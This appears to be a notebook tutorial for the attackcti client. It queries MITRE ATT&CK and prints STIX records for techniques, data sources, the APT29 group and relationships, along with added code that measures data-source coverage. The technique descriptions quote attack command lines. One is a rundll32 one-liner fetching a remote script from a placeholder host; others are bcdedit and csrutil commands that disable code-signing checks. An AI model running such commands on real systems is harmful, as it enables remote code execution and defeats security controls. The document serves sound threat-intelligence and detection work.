Filtering ATT&CK


Import ATTACK API Client

from attackcti import attack_client

Import Extra Libraries

from pandas import *

Initialize ATT&CK Client Variable

lift = attack_client()

Get Technique by Name (TAXII)

You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive.

technique_name = lift.get_technique_by_name('Rundll32')
technique_name
[AttackPattern(type='attack-pattern', id='attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-01-23T18:03:46.248Z', modified='2021-01-20T18:12:11.843Z', name='Rundll32', description='Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1218/011', external_id='T1218.011'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. 
(2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Casey Smith', 'Ricardo Dias'], x_mitre_data_sources=['Process: Process Creation', 'Command: Command Execution', 'Module: Module Load'], x_mitre_defense_bypassed=['Digital Certificate Validation', 'Application control', 'Anti-virus'], x_mitre_detection='Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['User'], x_mitre_platforms=['Windows'], x_mitre_version='1.0'),
 AttackPattern(type='attack-pattern', id='attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', created='2017-05-31T21:31:06.045Z', modified='2020-01-31T19:01:41.919Z', name='Rundll32', revoked=True, external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1085', external_id='T1085'), ExternalReference(source_name='Trend Micro CPL', description='Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', url='https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'), ExternalReference(source_name='This is Security Command Line Confusion', description='B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.', url='https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/')])]

Get Data Sources from All Techniques (TAXII)

  • You can also get all the data sources available in ATT&CK.

  • Currently the only techniques with data sources are the ones in Enterprise ATT&CK.

data_sources = lift.get_data_sources()
len(data_sources)
140
data_sources
['Windows Registry: Windows Registry Key Modification',
 'Command: Command Execution',
 'Process: Process Creation',
 'Instance: Instance Metadata',
 'Process: OS API Execution',
 'Cluster: Cluster Metadata',
 'Container: Container Enumeration',
 'Container: Container Metadata',
 'Pod: Pod Enumeration',
 'Pod: Pod Metadata',
 'Application Log: Application Log Content',
 'File: File Access',
 'User Account: User Account Authentication',
 'Image: Image Creation',
 'Network Traffic: Network Connection Creation',
 'Network Traffic: Network Traffic Flow',
 'Network Traffic: Network Traffic Content',
 'Container: Container Creation',
 'Container: Container Start',
 'Instance: Instance Creation',
 'Instance: Instance Start',
 'Scheduled Job: Scheduled Job Creation',
 'File: File Creation',
 'Pod: Pod Creation',
 'Pod: Pod Modification',
 'File: File Metadata',
 'Process: Process Access',
 'Active Directory: Active Directory Object Creation',
 'Active Directory: Active Directory Object Modification',
 'Active Directory: Active Directory Object Deletion',
 'Windows Registry: Windows Registry Key Creation',
 'Logon Session: Logon Session Creation',
 'Web Credential: Web Credential Creation',
 'Web Credential: Web Credential Usage',
 'Firmware: Firmware Modification',
 'File: File Modification',
 'Cloud Service: Cloud Service Modification',
 'Cloud Service: Cloud Service Disable',
 'Module: Module Load',
 'Driver: Driver Load',
 'Script: Script Execution',
 'File: File Content',
 'Active Directory: Active Directory Credential Request',
 'Instance: Instance Enumeration',
 'Snapshot: Snapshot Metadata',
 'Snapshot: Snapshot Enumeration',
 'Cloud Storage: Cloud Storage Metadata',
 'Cloud Storage: Cloud Storage Enumeration',
 'Volume: Volume Metadata',
 'Volume: Volume Enumeration',
 'Service: Service Creation',
 'Firewall: Firewall Rule Modification',
 'Firewall: Firewall Disable',
 'Instance: Instance Modification',
 'Instance: Instance Stop',
 'Instance: Instance Deletion',
 'Snapshot: Snapshot Creation',
 'Sensor Health: Host Status',
 'User Account: User Account Creation',
 'User Account: User Account Metadata',
 'Service: Service Metadata',
 'Drive: Drive Creation',
 'File: File Deletion',
 'Firewall: Firewall Metadata',
 'Firewall: Firewall Enumeration',
 'Group: Group Enumeration',
 'Group: Group Metadata',
 'Process: Process Termination',
 'Windows Registry: Windows Registry Key Deletion',
 'Windows Registry: Windows Registry Key Access',
 'Drive: Drive Access',
 'Drive: Drive Modification',
 'Process: Process Metadata',
 'Logon Session: Logon Session Metadata',
 'Active Directory: Active Directory Object Access',
 'Network Share: Network Share Access',
 'Image: Image Metadata',
 'Scheduled Job: Scheduled Job Metadata',
 'Scheduled Job: Scheduled Job Modification',
 'Kernel: Kernel Module Load',
 'WMI: WMI Creation',
 'User Account: User Account Modification',
 'Group: Group Modification',
 'Service: Service Modification',
 'Driver: Driver Metadata',
 'User Account: User Account Deletion',
 'Image: Image Modification',
 'Cloud Storage: Cloud Storage Access',
 'Snapshot: Snapshot Modification',
 'Snapshot: Snapshot Deletion',
 'Volume: Volume Creation',
 'Volume: Volume Modification',
 'Volume: Volume Deletion',
 'Cloud Storage: Cloud Storage Modification',
 'Cloud Storage: Cloud Storage Creation',
 'Cloud Service: Cloud Service Metadata',
 'Cloud Service: Cloud Service Enumeration',
 'Image: Image Deletion',
 'Cloud Storage: Cloud Storage Deletion',
 'Network protocol analysis',
 'Packet capture',
 'API monitoring',
 'Process monitoring',
 'System calls',
 'Sequential event recorder',
 'Controller program',
 'Windows event logs',
 'Authentication logs',
 'Alarm history',
 'Alarm thresholds',
 'Data historian',
 'Netflow/Enclave netflow',
 'Process use of network',
 'Application logs',
 'Data loss prevention',
 'Third-party application logs',
 'File monitoring',
 'Process command-line parameters',
 'Network device logs',
 'Host network interfaces',
 'Web proxy',
 'Detonation chamber',
 'Digital signatures',
 'Web logs',
 'Web application firewall logs',
 'Binary file metadata',
 'Asset management',
 'Windows Registry',
 'Network intrusion detection system',
 'Alarm History',
 'process use of network',
 'SSl/TLS inspection',
 'File Monitoring',
 'Windows error reporting',
 'Windows registry',
 'Controller parameters',
 'Malware reverse engineering',
 'Anti-virus',
 'Email gateway',
 'Mail server']
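The two lookups above return raw STIX objects: the name search for Rundll32 gives back both the current sub-technique (T1218.011) and the revoked T1085, and the data source list mixes the newer "Data Source: Component" form with legacy free-text names that differ only in case ("File monitoring" / "File Monitoring"). The following is an added example, not code from the attackcti notebook or library, showing how to filter such results offline: drop revoked and deprecated objects, de-duplicate data source names case-insensitively, and score each technique by how many of its data sources a SOC actually collects. The technique records are constructed to mimic the shape of the objects attack_client returns; stix2 objects expose the same Mapping interface (obj['name'], obj.get('revoked')), so the functions apply to real results as well.

```python
# Added example (not part of the attackcti notebook or library): filter ATT&CK
# technique records and measure data-source coverage offline.
# The records below are constructed to mimic the objects attack_client returns.

# Constructed sample: two results for a name lookup (one current, one revoked),
# a deprecated PRE-ATT&CK object, and two further current techniques.
SAMPLE_TECHNIQUES = [
    {"type": "attack-pattern", "name": "Rundll32",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1218.011"}],
     "x_mitre_data_sources": ["Process: Process Creation", "Command: Command Execution",
                              "Module: Module Load"]},
    {"type": "attack-pattern", "name": "Rundll32", "revoked": True,
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1085"}],
     "x_mitre_data_sources": ["Process monitoring", "Process command-line parameters"]},
    {"type": "attack-pattern", "name": "Acquire and/or use 3rd party infrastructure services",
     "x_mitre_deprecated": True,
     "external_references": [{"source_name": "mitre-pre-attack", "external_id": "T1307"}]},
    {"type": "attack-pattern", "name": "Web Protocols",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1071.001"}],
     "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow",
                              "Network Traffic: Network Traffic Content"]},
    {"type": "attack-pattern", "name": "Code Signing Policy Modification",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1553.006"}],
     "x_mitre_data_sources": ["Windows Registry: Windows Registry Key Modification",
                              "Command: Command Execution", "Process: Process Creation"]},
]


def attack_id(obj):
    """Return the ATT&CK external ID (T1234, G0016, ...) of a STIX object, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name", "").startswith("mitre-") and "external_id" in ref:
            return ref["external_id"]
    return None


def current_only(objects):
    """Drop revoked and deprecated objects: they remain in the TAXII feed but
    should not drive detection coverage or reporting."""
    return [o for o in objects
            if not o.get("revoked", False) and not o.get("x_mitre_deprecated", False)]


def normalise_data_source(raw):
    """Split 'Data Source: Component' into a lower-cased (source, component) pair.

    Legacy free-text entries such as 'Process monitoring' have no component.
    Lower-casing is needed because the feed mixes 'File monitoring' and
    'File Monitoring'."""
    source, sep, component = raw.partition(":")
    return (source.strip().lower(), component.strip().lower() if sep else "")


def unique_data_sources(names):
    """Case-insensitive, order-preserving de-duplication of data-source names."""
    seen, out = set(), []
    for name in names:
        key = normalise_data_source(name)
        if key not in seen:
            seen.add(key)
            out.append(name)
    return out


def coverage(techniques, collected):
    """Map each current technique ID to the fraction of its listed data sources
    that appear in `collected` (the sources a SOC actually ingests).
    Techniques that list no data sources get None."""
    have = {normalise_data_source(c) for c in collected}
    result = {}
    for tech in current_only(techniques):
        sources = tech.get("x_mitre_data_sources", [])
        if not sources:
            result[attack_id(tech)] = None
            continue
        hits = sum(1 for s in sources if normalise_data_source(s) in have)
        result[attack_id(tech)] = hits / len(sources)
    return result


if __name__ == "__main__":
    # Constructed list of what a hypothetical SOC collects; note the case difference.
    collected = ["Process: Process Creation", "command: command execution"]
    print(unique_data_sources(["File monitoring", "File Monitoring", "Process: Process Creation"]))
    print(coverage(SAMPLE_TECHNIQUES, collected))
```

Running it with the real feed means replacing SAMPLE_TECHNIQUES with `lift.get_techniques()` and `collected` with the data sources your pipeline actually ships; the None entries then point at techniques ATT&CK itself offers no telemetry for, which is worth knowing before reporting coverage numbers.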

Get Any STIX Object by ID (TAXII)

  • You can get any STIX object by its id across all the matrices. It is case sensitive.

  • You can use the following STIX Object Types:

    • attack-pattern > techniques

    • course-of-action > mitigations

    • intrusion-set > groups

    • malware

    • tool

object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')
object_by_id
[AttackPattern(type='attack-pattern', id='attack-pattern--286cc500-4291-45c2-99a1-e760db176402', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-12-14T16:46:06.044Z', modified='2020-10-26T13:42:49.342Z', name='Acquire and/or use 3rd party infrastructure services', description='This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-pre-attack', phase_name='adversary-opsec')], external_references=[ExternalReference(source_name='mitre-pre-attack', url='https://attack.mitre.org/techniques/T1307', external_id='T1307'), ExternalReference(source_name='LUCKYCAT2012', description='Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017.')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_deprecated=True, x_mitre_detectable_by_common_defenses='No', x_mitre_detectable_by_common_defenses_explanation='3rd party services highly leveraged by legitimate services, hard to distinguish from background noise.  While an adversary can use their own infrastructure, most know this is a sure-fire way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.', x_mitre_difficulty_for_adversary='Yes', x_mitre_difficulty_for_adversary_explanation='Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.', x_mitre_old_attack_id='PRE-T1084', x_mitre_version='1.0')]

Get Any Group by Alias (TAXII)

You can get any Group by its Alias property across all the matrices. It is case sensitive.

group_name = lift.get_group_by_alias('Cozy Bear')
group_name
[IntrusionSet(type='intrusion-set', id='intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2017-05-31T21:31:52.748Z', modified='2021-04-30T12:11:56.336Z', name='APT29', description="[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. 
Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)", aliases=['APT29', 'Dark Halo', 'StellarParticle', 'NOBELIUM', 'UNC2452', 'YTTRIUM', 'The Dukes', 'Cozy Bear', 'CozyDuke'], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/groups/G0016', external_id='G0016'), ExternalReference(source_name='APT29', description='(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='Dark Halo', description='(Citation: Volexity SolarWinds)'), ExternalReference(source_name='StellarParticle', description='(Citation: CrowdStrike SUNSPOT Implant January 2021)'), ExternalReference(source_name='NOBELIUM', description='(Citation: MSTIC NOBELIUM Mar 2021)'), ExternalReference(source_name='UNC2452', description='(Citation: FireEye SUNBURST Backdoor December 2020)'), ExternalReference(source_name='YTTRIUM', description='(Citation: Microsoft Unidentified Dec 2018)'), ExternalReference(source_name='The Dukes', description='(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='Cozy Bear', description='(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)'), ExternalReference(source_name='CozyDuke', description='(Citation: Crowdstrike DNC June 2016)'), ExternalReference(source_name='White House Imposing Costs RU Gov April 2021', description='White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. 
Retrieved April 16, 2021.', url='https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'), ExternalReference(source_name='UK Gov Malign RIS Activity April 2021', description='UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'), ExternalReference(source_name='F-Secure The Dukes', description='F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', url='https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'), ExternalReference(source_name='GRIZZLY STEPPE JAR', description='Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.', url='https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'), ExternalReference(source_name='Crowdstrike DNC June 2016', description='Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.', url='https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/'), ExternalReference(source_name='UK Gov UK Exposes Russia SolarWinds April 2021', description='UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', url='https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'), ExternalReference(source_name='NSA Joint Advisory SVR SolarWinds April 2021', description='NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. 
Retrieved April 16, 2021.', url='https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF'), ExternalReference(source_name='UK NSCS Russia SolarWinds April 2021', description='UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', url='https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'), ExternalReference(source_name='FireEye SUNBURST Backdoor December 2020', description='FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', url='https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'), ExternalReference(source_name='MSTIC NOBELIUM Mar 2021', description='Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.', url='https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/'), ExternalReference(source_name='CrowdStrike SUNSPOT Implant January 2021', description='CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.', url='https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/'), ExternalReference(source_name='Volexity SolarWinds', description='Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.', url='https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/'), ExternalReference(source_name='FireEye APT29 Nov 2018', description='Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. 
Retrieved November 27, 2018.', url='https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html'), ExternalReference(source_name='ESET Dukes October 2019', description='Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.', url='https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf'), ExternalReference(source_name='NCSC APT29 July 2020', description='National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.', url='https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf'), ExternalReference(source_name='Microsoft Unidentified Dec 2018', description='Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.', url='https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Matt Brenton, Zurich Insurance Group', 'Katie Nickels, Red Canary'], x_mitre_version='2.0')]

Get Relationships by Any Object (TAXII)

  • You can get available relationships defined in ATT&CK of type uses and mitigates for specific objects across all the matrices.

groups = lift.get_groups()
one_group = groups[0]
relationships = lift.get_relationships_by_object(one_group)
relationships[0]
Relationship(type='relationship', id='relationship--12e483aa-14a0-41ea-b6fd-7ced3590472b', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-14T14:05:51.798Z', modified='2021-04-14T14:05:51.798Z', relationship_type='uses', description='(Citation: Check Point Rocket Kitten)', source_ref='intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7', target_ref='tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5', external_references=[ExternalReference(source_name='Check Point Rocket Kitten', description='Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.', url='https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'])

Get All Techniques with Mitigations (TAXII)

The difference between this function and get_all_techniques() is that get_techniques_mitigated_by_all_mitigations() returns only the techniques that have at least one mitigation mapped to them.

techniques_mitigated = lift.get_techniques_mitigated_by_all_mitigations()
techniques_mitigated[0]
AttackPattern(type='attack-pattern', id='attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2021-04-23T01:04:57.161Z', modified='2021-04-26T15:41:39.155Z', name='Code Signing Policy Modification', description='Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \n\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. 
Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). 
Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1553/006', external_id='T1553.006'), ExternalReference(source_name='Microsoft DSE June 2017', description='Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN'), ExternalReference(source_name='Apple Disable SIP', description='Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021.', url='https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection'), ExternalReference(source_name='Microsoft Unsigned Driver Apr 2017', description='Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test'), ExternalReference(source_name='Microsoft TESTSIGNING Feb 2021', description='Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. 
Retrieved April 22, 2021.', url='https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option'), ExternalReference(source_name='FireEye HIKIT Rootkit Part 2', description='Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.', url='https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html'), ExternalReference(source_name='GitHub Turla Driver Loader', description='TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.', url='https://github.com/hfiref0x/TDL'), ExternalReference(source_name='F-Secure BlackEnergy 2014', description='F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.', url='https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf'), ExternalReference(source_name='Unit42 AcidBox June 2020', description='Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. 
Retrieved March 16, 2021.', url='https://unit42.paloaltonetworks.com/acidbox-rare-malware/')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_contributors=['Abel Morales, Exabeam'], x_mitre_data_sources=['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation'], x_mitre_defense_bypassed=['Application control', 'User Mode Signature Validation', 'Digital Certificate Validation'], x_mitre_detection='Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as <code>bcdedit.exe -set TESTSIGNING ON</code>.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as <code>HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing</code>. Modifications to the code signing policy of a system are likely to be rare.', x_mitre_is_subtechnique=True, x_mitre_permissions_required=['Administrator'], x_mitre_platforms=['Windows', 'macOS'], x_mitre_version='1.0')

Get Techniques Used by Software (TAXII)

This function returns the techniques mapped to a specific software (malware or tool) STIX object.

all_software = lift.get_software()
one_software = all_software[0]
software_techniques = lift.get_techniques_used_by_software(one_software)
software_techniques[0]
AttackPattern(type='attack-pattern', id='attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161', created_by_ref='identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', created='2020-03-15T16:13:46.151Z', modified='2020-03-26T20:15:35.821Z', name='Web Protocols', description='Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ', kill_chain_phases=[KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')], external_references=[ExternalReference(source_name='mitre-attack', url='https://attack.mitre.org/techniques/T1071/001', external_id='T1071.001'), ExternalReference(source_name='University of Birmingham C2', description='Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', url='https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf')], object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_data_sources=['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content'], x_mitre_detection='Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. 
